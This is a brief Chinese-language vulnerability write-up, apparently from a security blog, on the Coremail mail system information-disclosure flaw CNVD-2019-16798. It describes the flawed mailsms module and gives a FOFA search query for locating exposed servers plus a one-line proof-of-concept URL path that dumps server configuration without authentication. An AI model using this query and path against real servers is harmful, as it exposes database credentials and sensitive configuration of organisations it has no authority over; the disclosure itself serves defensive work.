漏洞描述
Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年,其前身为中国第一套中文电子邮件系统163126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 ,已成为中国用户实际使用最广泛的电子邮件系统。2019年5月22日,国家信息安全漏洞共享平台(CNVD)收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统信息泄露漏洞(CNVD-2019-16798)。由于Coremail邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知Coremail服务器的系统配置文件,造成数据库连接参数等系统敏感配置信息泄露。
漏洞复现
fofa:app="Coremail-邮件系统" && icon_hash="541942600"POC:
/mailsms/s?func=ADMIN:appState&dumpConfig=/
收藏
发表评论